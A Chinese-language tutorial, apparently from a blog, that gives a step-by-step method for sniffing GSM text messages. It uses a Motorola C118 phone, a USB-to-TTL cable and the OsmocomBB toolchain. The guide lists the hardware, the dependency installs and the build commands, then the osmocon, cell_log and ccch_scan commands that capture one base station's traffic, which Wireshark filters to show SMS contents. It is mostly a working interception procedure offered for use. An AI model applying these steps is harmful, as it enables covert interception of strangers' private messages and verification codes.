短信嗅探技术在几年前就非常成熟,如今实现的成本也非常低廉!

准备工作

  • 电脑
  • 摩托罗拉C118手机
  • 耳机线
  • USB2TTL线

运行环境

建议在BackTrack或Kali系统下操作

1
sudo apt-get install libtool shtool autoconf git-core pkg-config make gcc build-essential libgmp3-dev libmpfr-dev libx11-6 libx11-dev texinfo flex bison libncurses5 libncurses5-dbg libncurses5-dev libncursesw5 libncursesw5-dbg libncursesw5-dev zlibc zlib1g-dev libmpfr4 libmpc-dev

编译环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
git clone git://git.osmocom.org/osmocom-bb.git  
git clone git://git.osmocom.org/libosmocore.git

# 编译libosmocore
cd ~/libosmocore  
autoreconf -i  
./configure  
make  
sudo make install

# 编译libosmocore
cd ~/osmocom-bb  
git checkout --track origin/luca/gsmmap
cd src  
make

短信截包

将USB2TTL接到电脑,把耳机线一头接到手机,另外一头接到USB2TTL上

1
2
3
4
5
# 查看手机连接状态
lsmod | grep usb

cd ~/osmocom-bb/src/host/osmocon/  
./osmocon -m c123xor -p /dev/ttyUSB0 ../../target/firmware/board/compal_e88/layer1.compalram.bin

再开一个终端查看可用基站

1
2
cd ~/osmocom-bb/src/host/layer23/src/misc/
./cell_log

嗅探指定基站

1
2
cd ~/osmocom-bb/src/host/layer23/src/misc/
./ccch_scan -i 127.0.0.1 -a 117

再开一个终端窗口查看嗅探结果

1
sudo wireshark -k -i lo -f 'port 4729'

过滤只显示gsm_sms即可看到嗅探结果

短信嗅探配件

短信嗅探手机

短信嗅探手机

嗅探测试结果